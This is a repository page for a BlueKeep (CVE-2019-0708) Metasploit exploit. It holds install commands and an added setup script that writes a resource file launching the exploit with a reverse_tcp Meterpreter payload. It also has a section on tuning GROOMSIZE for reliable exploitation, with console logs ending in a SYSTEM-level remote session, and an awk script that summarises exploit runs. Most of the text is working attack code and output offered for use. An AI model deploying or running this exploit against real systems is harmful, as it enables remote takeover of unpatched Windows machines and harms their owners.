# bluekeep-exploit

**Repository Path**: yangb92/bluekeep-exploit

## Basic Information

- **Project Name**: bluekeep-exploit
- **Description**: No description available
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2020-03-14
- **Last Updated**: 2020-12-19

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# bluekeep-exploit

BlueKeep (CVE-2019-0708) exploit released: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

These are the Metasploit modules announced in that post (the RCE exploit, the RDP mixin and the two scanner modules). They were merged into upstream Metasploit at the time, so a current framework install already has `exploit/windows/rdp/cve_2019_0708_bluekeep_rce`; the copy steps below are only needed on an older install that lacks it.

How to use:

Make a folder named `rdp` (for convenience) in `/usr/share/metasploit-framework/modules/exploits/windows/`, paste the exploit file (`cve_2019_0708_bluekeep_rce.rb`) into that `rdp` folder and use your Metasploit skills.

Also replace the files in the following folders (`rdp.rb` is a framework library file, so keep a copy of the original; a package update will overwrite your copy again):

- `rdp.rb` --> `/usr/share/metasploit-framework/lib/msf/core/exploit/`

  ```sh
  cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
  ```

- `rdp_scanner.rb` --> `/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/`

  ```sh
  cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
  ```

- `cve_2019_0708_bluekeep.rb` --> `/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/`

  ```sh
  cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  ```

- `cve_2019_0708_bluekeep_rce.rb` --> `/usr/share/metasploit-framework/modules/exploits/windows/rdp/`

  ```sh
  cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  ```

Restart msfconsole (or run `reload_all`) so it picks up the new files, then:

```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

and apply your general concepts of setting RHOSTS, LHOST, PAYLOAD etc. Run the `auxiliary/scanner/rdp/cve_2019_0708_bluekeep` scanner first to confirm the host is vulnerable before exploiting it; the exploit itself can crash the target.

Thanks to the Genius Group of People for their wonderful work.

Note: I am not the developer of this exploit, only an enthusiast learning about exploits.

## How to make the exploit work reliably (GROOMSIZE tuning)
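The install and launch steps from the README above, collected into one script. This is an added example, not code from the yangb92/bluekeep-exploit repository or from Metasploit. It assumes the four `.rb` files sit in a source directory you pass in, that the framework root is `/usr/share/metasploit-framework` (the path the README uses), and it selects `windows/x64/meterpreter/reverse_tcp` because every target of this module is a 64-bit Windows 7 SP1 / 2008 R2 build; the GROOMSIZE default of 50 is the value the tuning runs further down settled on. The script name `bluekeep_setup.sh` and the resource-file name `bluekeep.rc` are my choices.

```sh
#!/bin/sh
# Added example, not part of the yangb92/bluekeep-exploit repository or of
# Metasploit. Installs the four files from the README into an existing
# framework tree (backing up anything it overwrites) and writes an msfconsole
# resource file with the options the README says to set.
# Assumptions: SRC holds rdp.rb, rdp_scanner.rb, cve_2019_0708_bluekeep.rb and
# cve_2019_0708_bluekeep_rce.rb; MSF_ROOT is the framework root
# (/usr/share/metasploit-framework on Kali); you can write there.
set -eu

# Copy each file to the location the README gives for it.
# rdp.rb replaces a framework library file, so the original is kept as .bak
# (a package update will overwrite the copy again; re-run after updating).
install_bluekeep_modules() {
  src=$1
  msf_root=$2
  for rel in \
    lib/msf/core/exploit/rdp.rb \
    modules/auxiliary/scanner/rdp/rdp_scanner.rb \
    modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb \
    modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  do
    name=${rel##*/}
    dest="$msf_root/$rel"
    if [ ! -f "$src/$name" ]; then
      echo "missing $src/$name" >&2
      return 1
    fi
    mkdir -p "${dest%/*}"
    if [ -f "$dest" ]; then
      cp -p "$dest" "$dest.bak"
    fi
    cp "$src/$name" "$dest"
  done
}

# Write a resource file: check first, then exploit. PAYLOAD is x64 because
# every target of this module is a 64-bit Windows 7 SP1 / 2008 R2 build.
# If automatic targeting picks the wrong hypervisor, add a `set TARGET n`
# line after looking at `show targets`.
write_bluekeep_rc() {
  out=$1
  rhost=$2
  lhost=$3
  groomsize=$4
  cat > "$out" <<EOF
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS $rhost
set LHOST $lhost
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set GROOMSIZE $groomsize
check
run
EOF
}

# Stand-alone use:
#   sh bluekeep_setup.sh install ./ /usr/share/metasploit-framework
#   sh bluekeep_setup.sh rc bluekeep.rc 192.168.43.137 192.168.43.84 50
#   msfconsole -q -r bluekeep.rc
case "${1-}" in
  install) install_bluekeep_modules "${2:-.}" "${3:-/usr/share/metasploit-framework}" ;;
  rc)      write_bluekeep_rc "$2" "$3" "$4" "${5:-50}" ;;
esac
```

Keep the `.bak` copies: if you later update the framework package, compare them against what the package installed before deciding whether the manual copy is still needed at all.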
############################

You have to set GROOMSIZE as shown below, trying different values and looking at the error each time. My VMware (Workstation 15) Windows guest had 2 GB RAM and a 1-core processor. Conclusion: setting GROOMSIZE to 50 worked as good as gold.

############################

GROOMSIZE is the size in MB of the kernel-pool groom, and the module aims the groom at GROOMBASE plus that many MB: in the three runs below the logged target address moves by exactly 0x3200000 (50 MB) per 50 units of GROOMSIZE, from a base of 0xfffffa8018c00000. The right value therefore depends on the guest's RAM and hypervisor, not only on the Windows build (6.1.7601 here). Two failure modes appear: a run that gets as far as "Forcing the USE of FREE'd object" and ends with no session (the groom missed), and a run that dies with `Errno::ECONNRESET` during "Lobbing eggs" (the target closed the connection; a missed groom can blue-screen the target, so confirm the guest is still up before retrying). Do not loop over GROOMSIZE values unattended against a host you cannot afford to crash.

```
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
GROOMSIZE => 100
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
GROOMSIZE => 150
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
GROOMSIZE => 50
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.43.137
[*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
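Once you are tuning GROOMSIZE over several runs, or several targets, the console transcript gets long. The following is an added example, not code from the repository or from Metasploit: a one-pass awk summary that turns a saved msfconsole transcript (for instance one written with msfconsole's `spool` command) into one line per run giving the GROOMSIZE, the logged target address and the outcome, and flags the connection-reset case separately so you know to check the guest before the next attempt. The sample transcript is constructed from the log lines above, abridged to the lines the summary keys on.

```sh
#!/bin/sh
# Added example, not part of the yangb92/bluekeep-exploit repository.
# Reads an msfconsole transcript on stdin and prints one line per run:
#   GROOMSIZE=<n> target=<addr> outcome=<no-session|disconnected|session>
# "disconnected" means the target closed the connection mid-groom; check
# whether the guest blue-screened before trying the next size.
summarize_groom_runs() {
  awk '
    # a new run starts when msfconsole echoes the GROOMSIZE assignment
    /^GROOMSIZE => / { size = $3; target = "?"; outcome = "?" }

    # the module logs the computed groom target address once per run;
    # the address is the token after "address", with a trailing comma
    /Using CHUNK grooming strategy/ {
      for (i = 1; i <= NF; i++)
        if ($i == "address") { target = $(i + 1); sub(/,$/, "", target) }
    }

    # connection reset mid-groom
    /Exploit failed \[disconnected\]/ { outcome = "disconnected" }

    # success: a session line is printed instead of "Exploit completed"
    /Meterpreter session [0-9]+ opened/ {
      outcome = "session"
      print "GROOMSIZE=" size " target=" target " outcome=" outcome
    }

    # end of an unsuccessful run; a plain miss has no earlier failure line
    /Exploit completed, but no session was created/ {
      if (outcome == "?") outcome = "no-session"
      print "GROOMSIZE=" size " target=" target " outcome=" outcome
    }
  '
}

# Constructed sample: the three runs from the README, reduced to the lines
# the summary reads.
sample_transcript() {
  cat <<'EOF'
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
GROOMSIZE => 100
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
GROOMSIZE => 150
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
[-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
GROOMSIZE => 50
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
[*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
EOF
}

# Stand-alone run over the constructed sample; for a real transcript use
#   summarize_groom_runs < msfconsole.log
sample_transcript | summarize_groom_runs
```

On the sample this prints one line per run, and the last one is the only `outcome=session`. Because the target address is GROOMBASE plus GROOMSIZE MB, the summary doubles as a record of which kernel addresses you have already probed on a given guest.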